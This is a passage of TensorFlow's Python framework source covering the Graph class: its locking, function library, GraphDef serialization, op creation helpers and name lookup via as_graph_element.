    """Saves the `op_type` as the `Operation` type."""
    # Validate both pieces of the registry key in declaration order; commas
    # are forbidden because the key is joined with "," in __call__.
    for arg_name, arg_value in (("op_type", op_type),
                                ("statistic_type", statistic_type)):
      if not isinstance(arg_value, six.string_types):
        raise TypeError("%s must be a string." % arg_name)
      if "," in arg_value:
        raise TypeError("%s must not contain a comma." % arg_name)
    self._op_type = op_type
    self._statistic_type = statistic_type

  def __call__(self, f):
    """Registers "f" as the statistics function for "op_type"."""
    registry_key = self._op_type + "," + self._statistic_type
    _stats_registry.register(f, registry_key)
    return f
def get_stats_for_node_def(graph, node, statistic_type):
  """Looks up the node's statistics function in the registry and calls it.

  This function takes a Graph object and a NodeDef from a GraphDef, and if
  there's an associated statistics method, calls it and returns a result. If no
  function has been registered for the particular node type, it returns an
  empty statistics object.

  Args:
    graph: A Graph object that's been set up with the node's graph.
    node: A NodeDef describing the operator.
    statistic_type: A string identifying the statistic we're interested in.

  Returns:
    An OpStats object containing information about resource usage.
  """
  try:
    # NOTE: a LookupError from either the registry lookup or the statistics
    # function itself is treated as "no statistics available".
    result = _stats_registry.lookup(node.op + "," + statistic_type)(graph,
                                                                    node)
  except LookupError:
    result = OpStats(statistic_type)
  return result
def name_from_scope_name(name):
  """Returns the name of an op given the name of its scope.

  Args:
    name: the name of the scope.

  Returns:
    the name of the op (equal to scope name minus any trailing slash).
  """
  # Falsy names (empty string, None) are passed through untouched.
  if name and name.endswith("/"):
    return name[:-1]
  return name
# Group indices for Graph._group_lock: op-mutating methods acquire the first
# group and Session.run acquires the second, so the two kinds of work exclude
# each other (see the comments in Graph.__init__).
_MUTATION_LOCK_GROUP = 0
_SESSION_RUN_LOCK_GROUP = 1
@tf_export("Graph")
class Graph(object):
"""A TensorFlow computation, represented as a dataflow graph.
A `Graph` contains a set of
`tf.Operation` objects,
which represent units of computation; and
`tf.Tensor` objects, which represent
the units of data that flow between operations.
A default `Graph` is always registered, and accessible by calling
`tf.compat.v1.get_default_graph`.
To add an operation to the default graph, simply call one of the functions
that defines a new `Operation`:
```python
c = tf.constant(4.0)
assert c.graph is tf.compat.v1.get_default_graph()
```
Another typical usage involves the
`tf.Graph.as_default`
context manager, which overrides the current default graph for the
lifetime of the context:
```python
g = tf.Graph()
with g.as_default():
# Define operations and tensors in `g`.
c = tf.constant(30.0)
assert c.graph is g
```
Important note: This class *is not* thread-safe for graph construction. All
operations should be created from a single thread, or external
synchronization must be provided. Unless otherwise specified, all methods
are not thread-safe.
A `Graph` instance supports an arbitrary number of "collections"
that are identified by name. For convenience when building a large
graph, collections can store groups of related objects: for
example, the `tf.Variable` uses a collection (named
`tf.GraphKeys.GLOBAL_VARIABLES`) for
all variables that are created during the construction of a graph. The caller
may define additional collections by specifying a new name.
"""
def __init__(self):
  """Creates a new, empty Graph."""
  # Protects core state that can be returned via public accessors.
  # Thread-safety is provided on a best-effort basis to support buggy
  # programs, and is not guaranteed by the public `tf.Graph` API.
  #
  # NOTE(mrry): This does not protect the various stacks. A warning will
  # be reported if these are used from multiple threads
  self._lock = threading.RLock()
  # The group lock synchronizes Session.run calls with methods that create
  # and mutate ops (e.g. Graph.create_op()). This synchronization is
  # necessary because it's illegal to modify an operation after it's been run.
  # The group lock allows any number of threads to mutate ops at the same time
  # but if any modification is going on, all Session.run calls have to wait.
  # Similarly, if one or more Session.run calls are going on, all mutate ops
  # have to wait until all Session.run calls have finished.
  self._group_lock = lock_util.GroupLock(num_groups=2)
  self._nodes_by_id = {}  # GUARDED_BY(self._lock)
  self._next_id_counter = 0  # GUARDED_BY(self._lock)
  self._nodes_by_name = {}  # GUARDED_BY(self._lock)
  self._version = 0  # GUARDED_BY(self._lock)
  # Maps a name used in the graph to the next id to use for that name.
  self._names_in_use = {}
  self._stack_state_is_thread_local = False
  self._thread_local = threading.local()
  # Functions that will be applied to choose a device if none is specified.
  # In TF2.x or after switch_to_thread_local(),
  # self._thread_local._device_function_stack is used instead.
  self._graph_device_function_stack = traceable_stack.TraceableStack()
  # Default original_op applied to new ops.
  self._default_original_op = None
  # Current control flow context. It could be either CondContext or
  # WhileContext defined in ops/control_flow_ops.py
  self._control_flow_context = None
  # A new node will depend on the union of all of the nodes in the stack.
  # In TF2.x or after switch_to_thread_local(),
  # self._thread_local._control_dependencies_stack is used instead.
  self._graph_control_dependencies_stack = []
  # Arbitrary collections of objects.
  self._collections = {}
  # The graph-level random seed
  self._seed = None
  # A dictionary of attributes that should be applied to all ops.
  self._attr_scope_map = {}
  # A map from op type to the kernel label that should be used.
  self._op_to_kernel_label_map = {}
  # A map from op type to an alternative op type that should be used when
  # computing gradients.
  self._gradient_override_map = {}
  # True if the graph is considered "finalized". In that case no
  # new operations can be added.
  self._finalized = False
  # Functions defined in the graph
  self._functions = collections.OrderedDict()
  # Default GraphDef versions
  self._graph_def_versions = versions_pb2.VersionDef(
      producer=versions.GRAPH_DEF_VERSION,
      min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER)
  self._building_function = False
  # Stack of colocate_with ops. In TF2.x or after switch_to_thread_local(),
  # self._thread_local._colocation_stack is used instead.
  self._graph_colocation_stack = traceable_stack.TraceableStack()
  # Set of tensors that are dangerous to feed!
  self._unfeedable_tensors = object_identity.ObjectIdentitySet()
  # Set of operations that are dangerous to fetch!
  self._unfetchable_ops = set()
  # A map of tensor handle placeholder to tensor dtype.
  self._handle_feeders = {}
  # A map from tensor handle to its read op.
  self._handle_readers = {}
  # A map from tensor handle to its move op.
  self._handle_movers = {}
  # A map from tensor handle to its delete op.
  self._handle_deleters = {}
  # Allow optimizers and other objects to pseudo-uniquely key graphs (this key
  # will be shared when defining function graphs, for example, so optimizers
  # being called inside function definitions behave as if they were seeing the
  # actual outside graph).
  # NOTE(review): the "grap-key" spelling is historical; other code may match
  # the exact string, so it must not be "fixed".
  self._graph_key = "grap-key-%d/" % (uid(),)
  # A string with the last reduction method passed to
  # losses.compute_weighted_loss(), or None. This is required only for
  # backward compatibility with Estimator and optimizer V1 use cases.
  self._last_loss_reduction = None
  # Flag that is used to indicate whether loss has been scaled by optimizer.
  # If this flag has been set, then estimator uses it to scale loss back
  # before reporting. This is required only for backward compatibility with
  # Estimator and optimizer V1 use cases.
  self._is_loss_scaled_by_optimizer = False
  self._container = ""
  self._registered_ops = op_def_registry.get_registered_ops()
  # Set to True if this graph is being built in an
  # AutomaticControlDependencies context.
  self._add_control_dependencies = False
  # Cache for OpDef protobufs retrieved via the C API.
  self._op_def_cache = {}
  # Cache for constant results of `broadcast_gradient_args()`. The keys are
  # tuples of fully-defined shapes: (x_shape_tuple, y_shape_tuple), and the
  # values are tuples of reduction indices: (rx, ry).
  self._bcast_grad_args_cache = {}
  # Cache for constant results of `reduced_shape()`. The keys are pairs of
  # tuples: (input_shape_tuple, reduction_indices_tuple), and the values
  # are pairs of tuples: (output_shape_kept_dims, tile_scaling).
  self._reduced_shape_cache = {}
  # TODO(skyewm): fold as much of the above as possible into the C
  # implementation
  # Owns the underlying TF_Graph; must exist before the C API call below,
  # which reads it through the `_c_graph` property.
  self._scoped_c_graph = c_api_util.ScopedTFGraph()
  # The C API requires all ops to have shape functions. Disable this
  # requirement (many custom ops do not have shape functions, and we don't
  # want to break these existing cases).
  c_api.SetRequireShapeInferenceFns(self._c_graph, False)
  if tf2.enabled():
    self.switch_to_thread_local()
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@tf_contextlib.contextmanager
def _variable_creator_scope(self, creator, priority=100):
  """Scope which defines a variable creation function.

  Args:
    creator: A callable taking `next_creator` and `kwargs`. See the
      `tf.variable_creator_scope` docstring.
    priority: Creators with a higher `priority` are called first. Within the
      same priority, creators are called inner-to-outer.

  Yields:
    `_variable_creator_scope` is a context manager with a side effect, but
    doesn't return a value.

  Raises:
    RuntimeError: If variable creator scopes are not properly nested.
  """
  # This step keeps a reference to the existing stack, and it also initializes
  # self._thread_local._variable_creator_stack if it doesn't exist yet.
  old = self._variable_creator_stack
  new = list(old)
  new.append((priority, creator))
  # Sorting is stable, so we'll put higher-priority creators later in the list
  # but otherwise maintain registration order.
  new.sort(key=lambda item: item[0])
  self._thread_local._variable_creator_stack = new  # pylint: disable=protected-access
  try:
    yield
  finally:
    # Identity (not equality) check: if any other code replaced the stack
    # object while we were active, the scopes were not properly nested.
    if self._thread_local._variable_creator_stack is not new:  # pylint: disable=protected-access
      raise RuntimeError(
          "Exiting variable_creator_scope without proper nesting.")
    self._thread_local._variable_creator_stack = old  # pylint: disable=protected-access
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@property
def _variable_creator_stack(self):
  """The per-thread list of (priority, creator) pairs, lazily initialized."""
  if not hasattr(self._thread_local, "_variable_creator_stack"):
    self._thread_local._variable_creator_stack = []  # pylint: disable=protected-access
  # This previously returned a copy of the stack instead of the stack itself,
  # to guard against accidental mutation. Consider, however, code that wants
  # to save and restore the variable creator stack:
  #   def f():
  #     original_stack = graph._variable_creator_stack
  #     graph._variable_creator_stack = new_stack
  #     ...  # Some code
  #     graph._variable_creator_stack = original_stack
  #
  # And lets say you have some code that calls this function with some
  # variable_creator:
  #   def g():
  #     with variable_scope.variable_creator_scope(creator):
  #       f()
  # When exiting the variable creator scope, it would see a different stack
  # object than it expected leading to a "Exiting variable_creator_scope
  # without proper nesting" error.
  return self._thread_local._variable_creator_stack  # pylint: disable=protected-access
@_variable_creator_stack.setter
def _variable_creator_stack(self, variable_creator_stack):
  # Replaces the current thread's stack wholesale; used by code that saves
  # and restores creator state (see the property's comment above).
  self._thread_local._variable_creator_stack = variable_creator_stack  # pylint: disable=protected-access
def _check_not_finalized(self):
  """Check if the graph is finalized.

  Raises:
    RuntimeError: If the graph finalized.
  """
  if self._finalized:
    raise RuntimeError("Graph is finalized and cannot be modified.")
def _add_op(self, op, op_id, op_name):
  """Records `op` in the graph's id and name lookup tables.

  Args:
    op: the Operation to add.
    op_id: the ID of the Operation.
    op_name: the name of the Operation.
  """
  self._check_not_finalized()
  with self._lock:
    self._nodes_by_id[op_id] = op
    self._nodes_by_name[op_name] = op
    # The graph version tracks the highest op id seen so far.
    if op_id > self._version:
      self._version = op_id
@property
def _c_graph(self):
  """The wrapped TF_Graph object, or None if it has been released."""
  return self._scoped_c_graph.graph if self._scoped_c_graph else None
@property
def version(self):
  """Returns a version number that increases as ops are added to the graph.

  Note that this is unrelated to the
  `tf.Graph.graph_def_versions`.

  Returns:
    An integer version that increases as ops are added to the graph.
  """
  if self._finalized:
    # A finalized graph can no longer change, so the lock is unnecessary.
    return self._version

  with self._lock:
    return self._version
@property
def graph_def_versions(self):
  # pylint: disable=line-too-long
  """The GraphDef version information of this graph.

  For details on the meaning of each version, see
  [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto).

  Returns:
    A `VersionDef`.
  """
  # pylint: enable=line-too-long
  # Serialize the version info out of the C graph, then parse it back into
  # a Python protobuf object.
  with c_api_util.tf_buffer() as buf:
    c_api.TF_GraphVersions(self._c_graph, buf)
    data = c_api.TF_GetBuffer(buf)
  version_def = versions_pb2.VersionDef()
  version_def.ParseFromString(compat.as_bytes(data))
  return version_def
@property
def seed(self):
  """The graph-level random seed of this graph."""
  return self._seed
@seed.setter
def seed(self, seed):
  # No validation here; consumers interpret the seed value themselves.
  self._seed = seed
@property
def finalized(self):
  """True if this graph has been finalized."""
  return self._finalized
def finalize(self):
  """Finalizes this graph, making it read-only.

  After calling `g.finalize()`, no new operations can be added to
  `g`. This method is used to ensure that no operations are added
  to a graph when it is shared between multiple threads, for example
  when using a `tf.compat.v1.train.QueueRunner`.
  """
  self._finalized = True
def _unsafe_unfinalize(self):
  """Opposite of `finalize`.

  Internal interface.

  NOTE: Unfinalizing a graph could have negative impact on performance,
  especially in a multi-threaded environment. Unfinalizing a graph
  when it is in use by a Session may lead to undefined behavior. Ensure
  that all sessions using a graph are closed before calling this method.
  """
  self._finalized = False
def _get_control_flow_context(self):
  """Returns the current control flow context.

  Returns:
    A context object.
  """
  return self._control_flow_context
def _set_control_flow_context(self, ctx):
  """Sets the current control flow context.

  Args:
    ctx: a context object.
  """
  self._control_flow_context = ctx
def _copy_functions_to_graph_def(self, graph_def, starting_bytesize):
  """If this graph contains functions, copy them to `graph_def`.

  Args:
    graph_def: a GraphDef protobuf to receive the function definitions.
    starting_bytesize: size already accumulated in `graph_def`, used to
      enforce the 2GB serialized-proto limit.

  Raises:
    ValueError: if adding a function would push the GraphDef past 2GB.
  """
  total_bytes = starting_bytesize
  for func in self._functions.values():
    # Check the running size before appending each function definition.
    total_bytes += func.definition.ByteSize()
    if total_bytes >= (1 << 31) or total_bytes < 0:
      raise ValueError("GraphDef cannot be larger than 2GB.")
    graph_def.library.function.extend([func.definition])
    if func.grad_func_name:
      gradient_def = function_pb2.GradientDef()
      gradient_def.function_name = func.name
      gradient_def.gradient_func = func.grad_func_name
      graph_def.library.gradient.extend([gradient_def])
def _as_graph_def(self, from_version=None, add_shapes=False):
  # pylint: disable=line-too-long
  """Returns a serialized `GraphDef` representation of this graph.

  The serialized `GraphDef` can be imported into another `Graph`
  (using `tf.import_graph_def`) or used with the
  [C++ Session API](../../../../api_docs/cc/index.md).

  This method is thread-safe.

  Args:
    from_version: Optional. If this is set, returns a `GraphDef` containing
      only the nodes that were added to this graph since its `version`
      property had the given value.
    add_shapes: If true, adds an "_output_shapes" list attr to each node with
      the inferred shapes of each of its outputs.

  Returns:
    A tuple containing a
    [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
    protocol buffer, and the version of the graph to which that
    `GraphDef` corresponds.

  Raises:
    ValueError: If the `graph_def` would be too large.
  """
  # pylint: enable=line-too-long
  with self._lock:
    # Serialize the full graph through the C API, then parse it back into a
    # Python GraphDef protobuf.
    with c_api_util.tf_buffer() as buf:
      c_api.TF_GraphToGraphDef(self._c_graph, buf)
      data = c_api.TF_GetBuffer(buf)
    graph = graph_pb2.GraphDef()
    graph.ParseFromString(compat.as_bytes(data))
    # Strip the experimental library field iff it's empty.
    if not graph.library.function:
      graph.ClearField("library")

    if add_shapes:
      # Annotate each top-level node with the shapes of its outputs.
      for node in graph.node:
        op = self._nodes_by_name[node.name]
        if op.outputs:
          node.attr["_output_shapes"].list.shape.extend(
              [output.get_shape().as_proto() for output in op.outputs])
      # Do the same for nodes inside each function in the library.
      for function_def in graph.library.function:
        defined_function = self._functions[function_def.signature.name]
        try:
          func_graph = defined_function.graph
        except AttributeError:
          # _DefinedFunction doesn't have a graph, _EagerDefinedFunction
          # does. Both rely on ops.py, so we can't really isinstance check
          # them.
          continue
        input_shapes = function_def.attr["_input_shapes"]
        try:
          func_graph_inputs = func_graph.inputs
        except AttributeError:
          continue
        for input_tensor in func_graph_inputs:
          if input_tensor.dtype == dtypes.resource:
            # TODO(allenl): Save and restore handle data, then save the
            # resource placeholder's shape. Right now some shape functions get
            # confused if we set the shape of the resource placeholder (to a
            # scalar of course) and there isn't any handle data.
            input_shapes.list.shape.add().CopyFrom(
                tensor_shape.TensorShape(None).as_proto())
          else:
            input_shapes.list.shape.add().CopyFrom(
                input_tensor.get_shape().as_proto())
        for node in function_def.node_def:
          try:
            op = func_graph.get_operation_by_name(node.name)
          except KeyError:
            # Nodes with no corresponding Operation are left unannotated.
            continue
          node.attr["_output_shapes"].list.shape.extend(
              [output.get_shape().as_proto() for output in op.outputs])

    return graph, self._version
def as_graph_def(self, from_version=None, add_shapes=False):
  # pylint: disable=line-too-long
  """Returns a serialized `GraphDef` representation of this graph.

  The serialized `GraphDef` can be imported into another `Graph`
  (using `tf.import_graph_def`) or used with the
  [C++ Session API](../../api_docs/cc/index.md).

  This method is thread-safe.

  Args:
    from_version: Optional. If this is set, returns a `GraphDef` containing
      only the nodes that were added to this graph since its `version`
      property had the given value.
    add_shapes: If true, adds an "_output_shapes" list attr to each node with
      the inferred shapes of each of its outputs.

  Returns:
    A
    [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
    protocol buffer.

  Raises:
    ValueError: If the `graph_def` would be too large.
  """
  # pylint: enable=line-too-long
  # Delegate to the private helper and drop the version it also returns.
  graph_def, _ = self._as_graph_def(from_version, add_shapes)
  return graph_def
def _is_function(self, name):
  """Tests whether 'name' is registered in this graph's function library.

  Args:
    name: string op name.

  Returns:
    bool indicating whether or not 'name' is registered in function library.
  """
  # Normalize bytes/unicode before the membership test.
  key = compat.as_str(name)
  return key in self._functions
def _get_function(self, name):
  """Returns the function definition for 'name'.

  Args:
    name: string function name.

  Returns:
    The function def proto, or None if no such function is registered.
  """
  # dict.get already defaults to None for missing keys.
  return self._functions.get(compat.as_str(name))
def _add_function(self, function):
  """Adds a function to the graph.

  After the function has been added, you can call to the function by
  passing the function name in place of an op name to
  `Graph.create_op()`.

  Args:
    function: A `_DefinedFunction` object.

  Raises:
    ValueError: if another function is defined with the same name.
  """
  name = function.name
  # Sanity checks on gradient definition.
  if (function.grad_func_name is not None) and (function.python_grad_func is
                                                not None):
    raise ValueError("Gradient defined twice for function %s" % name)

  # Add function to graph
  # pylint: disable=protected-access
  gradient = (
      function._grad_func._c_func.func if function._grad_func else None)
  # Registering with the C graph first; it raises on duplicate names.
  c_api.TF_GraphCopyFunction(self._c_graph, function._c_func.func, gradient)
  # pylint: enable=protected-access

  self._functions[compat.as_str(name)] = function

  # Need a new-enough consumer to support the functions we add to the graph.
  if self._graph_def_versions.min_consumer < 12:
    self._graph_def_versions.min_consumer = 12
@property
def building_function(self):
  """Returns True iff this graph represents a function."""
  return self._building_function
# Helper functions to create operations.
@deprecated_args(None,
                 "Shapes are always computed; don't use the compute_shapes "
                 "as it has no effect.", "compute_shapes")
def create_op(
    self,
    op_type,
    inputs,
    dtypes=None,  # pylint: disable=redefined-outer-name
    input_types=None,
    name=None,
    attrs=None,
    op_def=None,
    compute_shapes=True,
    compute_device=True):
  """Creates an `Operation` in this graph.

  This is a low-level interface for creating an `Operation`. Most
  programs will not call this method directly, and instead use the
  Python op constructors, such as `tf.constant()`, which add ops to
  the default graph.

  Args:
    op_type: The `Operation` type to create. This corresponds to the
      `OpDef.name` field for the proto that defines the operation.
    inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
    dtypes: (Optional) A list of `DType` objects that will be the types of the
      tensors that the operation produces.
    input_types: (Optional.) A list of `DType`s that will be the types of the
      tensors that the operation consumes. By default, uses the base `DType`
      of each input in `inputs`. Operations that expect reference-typed inputs
      must specify `input_types` explicitly.
    name: (Optional.) A string name for the operation. If not specified, a
      name is generated based on `op_type`.
    attrs: (Optional.) A dictionary where the key is the attribute name (a
      string) and the value is the respective `attr` attribute of the
      `NodeDef` proto that will represent the operation (an `AttrValue`
      proto).
    op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
      the operation will have.
    compute_shapes: (Optional.) Deprecated. Has no effect (shapes are always
      computed).
    compute_device: (Optional.) If True, device functions will be executed to
      compute the device property of the Operation.

  Raises:
    TypeError: if any of the inputs is not a `Tensor`.
    ValueError: if colocation conflicts with existing device assignment.

  Returns:
    An `Operation` object.
  """
  # Deprecated argument, accepted only for backward compatibility.
  del compute_shapes
  # Validate inputs eagerly so callers get a clear error before the cheaper
  # internal path (which skips this check) is invoked.
  for idx, a in enumerate(inputs):
    if not isinstance(a, Tensor):
      raise TypeError("Input #%d is not a tensor: %s" % (idx, a))
  return self._create_op_internal(op_type, inputs, dtypes, input_types, name,
                                  attrs, op_def, compute_device)
def _create_op_internal(
    self,
    op_type,
    inputs,
    dtypes=None,  # pylint: disable=redefined-outer-name
    input_types=None,
    name=None,
    attrs=None,
    op_def=None,
    compute_device=True):
  """Creates an `Operation` in this graph.

  Implements `Graph.create_op()` without the overhead of the deprecation
  wrapper.

  Args:
    op_type: The `Operation` type to create. This corresponds to the
      `OpDef.name` field for the proto that defines the operation.
    inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
    dtypes: (Optional) A list of `DType` objects that will be the types of the
      tensors that the operation produces.
    input_types: (Optional.) A list of `DType`s that will be the types of the
      tensors that the operation consumes. By default, uses the base `DType`
      of each input in `inputs`. Operations that expect reference-typed inputs
      must specify `input_types` explicitly.
    name: (Optional.) A string name for the operation. If not specified, a
      name is generated based on `op_type`.
    attrs: (Optional.) A dictionary where the key is the attribute name (a
      string) and the value is the respective `attr` attribute of the
      `NodeDef` proto that will represent the operation (an `AttrValue`
      proto).
    op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
      the operation will have.
    compute_device: (Optional.) If True, device functions will be executed to
      compute the device property of the Operation.

  Raises:
    ValueError: if colocation conflicts with existing device assignment.

  Returns:
    An `Operation` object.
  """
  self._check_not_finalized()
  if name is None:
    name = op_type
  # If a name ends with a '/' it is a "name scope" and we use it as-is,
  # after removing the trailing '/'.
  if name and name[-1] == "/":
    name = name_from_scope_name(name)
  else:
    name = self.unique_name(name)

  node_def = _NodeDef(op_type, name, attrs)

  input_ops = set([t.op for t in inputs])
  control_inputs = self._control_dependencies_for_inputs(input_ops)
  # _create_op_helper mutates the new Operation. `_mutation_lock` ensures a
  # Session.run call cannot occur between creating and mutating the op.
  with self._mutation_lock():
    ret = Operation(
        node_def,
        self,
        inputs=inputs,
        output_types=dtypes,
        control_inputs=control_inputs,
        input_types=input_types,
        original_op=self._default_original_op,
        op_def=op_def)
    self._create_op_helper(ret, compute_device=compute_device)
  return ret
def _create_op_from_tf_operation(self, c_op, compute_device=True):
  """Creates an `Operation` in this graph from the supplied TF_Operation.

  This method is like create_op() except the new Operation is constructed
  using `c_op`. The returned Operation will have `c_op` as its _c_op
  field. This is used to create Operation objects around TF_Operations created
  indirectly by the C API (e.g. by TF_ImportGraphDef, TF_FinishWhile).

  This function does not call Operation._control_flow_post_processing or
  Graph._control_dependencies_for_inputs (since the inputs may not be
  available yet). The caller is responsible for calling these methods.

  Args:
    c_op: a wrapped TF_Operation
    compute_device: (Optional.) If True, device functions will be executed to
      compute the device property of the Operation.

  Returns:
    An `Operation` object.
  """
  self._check_not_finalized()
  ret = Operation(c_op, self)
  # If a name_scope was created with ret.name but no nodes were created in it,
  # the name will still appear in _names_in_use even though the name hasn't
  # been used. This is ok, just leave _names_in_use as-is in this case.
  # TODO(skyewm): make the C API guarantee no name conflicts.
  self._names_in_use.setdefault(ret.name.lower(), 1)
  self._create_op_helper(ret, compute_device=compute_device)
  return ret
def _create_op_helper(self, op, compute_device=True):
  """Common logic for creating an op in this graph.

  Applies scoped attrs, kernel labels, gradient overrides, control
  dependencies, device functions, colocation constraints and the container
  attribute to `op`, in that order.

  Args:
    op: the newly created `Operation` to configure.
    compute_device: If True, run the graph's device functions to pick a
      device for `op`.
  """
  # Apply any additional attributes requested. Do not overwrite any existing
  # attributes.
  for key, value in self._attr_scope_map.items():
    try:
      # A ValueError here means the attr is not already set on the op.
      op.get_attr(key)
    except ValueError:
      if callable(value):
        value = value(op.node_def)
        if not isinstance(value, (type(None), attr_value_pb2.AttrValue)):
          raise TypeError(
              "Callable for scope map key '%s' must return either None or "
              "an AttrValue protocol buffer; but it returned: %s" %
              (key, value))
      if value:
        op._set_attr(key, value)  # pylint: disable=protected-access

  # Apply a kernel label if one has been specified for this op type.
  try:
    kernel_label = self._op_to_kernel_label_map[op.type]
    op._set_attr("_kernel",  # pylint: disable=protected-access
                 attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label)))
  except KeyError:
    # No kernel label registered for this op type.
    pass

  # Apply the overriding op type for gradients if one has been specified for
  # this op type.
  try:
    mapped_op_type = self._gradient_override_map[op.type]
    op._set_attr("_gradient_op_type",  # pylint: disable=protected-access
                 attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type)))
  except KeyError:
    # No gradient override registered for this op type.
    pass

  self._record_op_seen_by_control_dependencies(op)

  if compute_device:
    self._apply_device_functions(op)

  # Snapshot the colocation stack metadata before we might generate error
  # messages using it. Note that this snapshot depends on the actual stack
  # and is independent of the op's _class attribute.
  # pylint: disable=protected-access
  op._colocation_code_locations = self._snapshot_colocation_stack_metadata()
  # pylint: enable=protected-access

  if self._colocation_stack:
    all_colocation_groups = []
    for colocation_op in self._colocation_stack.peek_objs():
      all_colocation_groups.extend(colocation_op.colocation_groups())
      if colocation_op.device:
        # pylint: disable=protected-access
        op._set_device(colocation_op.device)
        # pylint: enable=protected-access

    # Deduplicate and sort for a deterministic attr value.
    all_colocation_groups = sorted(set(all_colocation_groups))
    # pylint: disable=protected-access
    op._set_attr(
        "_class",
        attr_value_pb2.AttrValue(
            list=attr_value_pb2.AttrValue.ListValue(s=all_colocation_groups)))
    # pylint: enable=protected-access

  # Sets "container" attribute if
  # (1) self._container is not None
  # (2) "is_stateful" is set in OpDef
  # (3) "container" attribute is in OpDef
  # (4) "container" attribute is None
  if self._container and op._is_stateful:  # pylint: disable=protected-access
    try:
      container_attr = op.get_attr("container")
    except ValueError:
      # "container" attribute is not in OpDef
      pass
    else:
      if not container_attr:
        op._set_attr("container", attr_value_pb2.AttrValue(  # pylint: disable=protected-access
            s=compat.as_bytes(self._container)))
def _add_new_tf_operations(self, compute_devices=True):
  """Creates `Operations` in this graph for any new TF_Operations.

  This is useful for when TF_Operations are indirectly created by the C API
  outside of the Operation constructor (e.g. by TF_ImportGraphDef,
  TF_FinishWhile). This ensures there are corresponding Operations for all
  TF_Operations in the underlying TF_Graph.

  Args:
    compute_devices: (Optional.) If True, device functions will be executed to
      compute the device properties of each new Operation.

  Returns:
    A list of the new `Operation` objects.
  """
  # Create all Operation objects before accessing their inputs since an op may
  # be created before its inputs.
  new_ops = [
      self._create_op_from_tf_operation(c_op, compute_device=compute_devices)
      for c_op in c_api_util.new_tf_operations(self)
  ]

  # Second pass: now that every op exists, wire up control dependencies and
  # run control flow post-processing.
  # pylint: disable=protected-access
  for op in new_ops:
    new_control_inputs = self._control_dependencies_for_inputs(op.inputs)
    op._add_control_inputs(new_control_inputs)
    op._control_flow_post_processing()
  # pylint: enable=protected-access

  return new_ops
def as_graph_element(self, obj, allow_tensor=True, allow_operation=True):
  """Returns the object referred to by `obj`, as an `Operation` or `Tensor`.

  This function validates that `obj` represents an element of this
  graph, and gives an informative error message if it is not.

  This function is the canonical way to get/validate an object of
  one of the allowed types from an external argument reference in the
  Session API.

  This method may be called concurrently from multiple threads.

  Args:
    obj: A `Tensor`, an `Operation`, or the name of a tensor or operation. Can
      also be any object with an `_as_graph_element()` method that returns a
      value of one of these types. Note: `_as_graph_element` will be called
      inside the graph's lock and so may not modify the graph.
    allow_tensor: If true, `obj` may refer to a `Tensor`.
    allow_operation: If true, `obj` may refer to an `Operation`.

  Returns:
    The `Tensor` or `Operation` in the Graph corresponding to `obj`.

  Raises:
    TypeError: If `obj` is not a type we support attempting to convert
      to types.
    ValueError: If `obj` is of an appropriate type but invalid. For
      example, an invalid string.
    KeyError: If `obj` is not an object in the graph.
  """
  if not self._finalized:
    with self._lock:
      return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
  # A finalized graph cannot change, so no lock is needed for the lookup.
  return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
def _as_graph_element_locked(self, obj, allow_tensor, allow_operation):
"""See `Graph.as_graph_element()` for details."""
# The vast majority of this function is figuring
# out what an API user might be doing wrong, so
# that we can give helpful error messages.
#
# Ideally, it would be nice to split it up, but we
# need context to generate nice error messages.
if allow_tensor and allow_operation:
types_str = "Tensor or Operation"
elif allow_tensor:
types_str = "Tensor"
elif allow_operation:
types_str = "Operation"
else:
raise ValueError("allow_tensor and allow_operation can't both be False.")
temp_obj = _as_graph_element(obj)
if temp_obj is not None:
obj = temp_obj
# If obj appears to be a name...
if isinstance(obj, compat.bytes_or_text_types):
name = compat.as_str(obj)
if ":" in name and allow_tensor:
# Looks like a Tensor name and can be a Tensor.
try:
op_name, out_n = name.split(":")
out_n = int(out_n)
except:
raise ValueError("The name %s looks a like a Tensor name, but is "
"not a valid one. Tensor names must be of the "
"form \"<op_name>:<output_index>\"." % repr(name))
if op_name in self._nodes_by_name:
op = self._nodes_by_name[op_name]
else:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, does not exist in the "
"graph." % (repr(name), repr(op_name)))
try:
return op.outputs[out_n]
except:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, exists but only has "
"%s outputs." %
(repr(name), repr(op_name), len(op.outputs)))
elif ":" in name and not allow_tensor:
# Looks like a Tensor name but can't be a Tensor.
raise ValueError("Name %s appears to refer to a Tensor, not a %s." %
(repr(name), types_str))
elif ":" not in name and allow_operation:
# Looks like an Operation name and can be an Operation.
if name not in self._nodes_by_name:
raise KeyError("The name %s refers to an Operation not in the "
"graph." % repr(name))
return self._nodes_by_name[name]
elif ":" not in name and not allow_operation:
# Looks like an Operation name but can't be an Operation.
if name in self._nodes_by_name:
# Yep, it's an Operation name
err_msg = ("The name %s refers to an Operation, not a %s." %
(repr(name), types_str))
else:
err_msg = ("The name %s looks like an (invalid) Operation name, "
"not a %s." % (repr(name), types_str))
err_msg += (" Tensor names must be of the form "
"\"<op_name>:<output_index>\".")
raise ValueError(err_msg)
elif isinstance(obj, Tensor) and allow_tensor:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Tensor %s is not an element of this graph." % obj)
return obj
elif isinstance(obj, Operation) and allow_operation:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Operation %s is not an element of this graph." % obj)
return obj
else:
# We give up!
raise TypeError("Can not convert a %s into a %s." %
(type(obj).__name__, types_str))
def get_operations(self):
"""Return the list of operations in the graph.
You can modify the operations in place, but modifications
to the list such as inserts/delete have no effect on the
list of operations known to the graph.
This method may be called concurrently from multiple threads.
Returns:
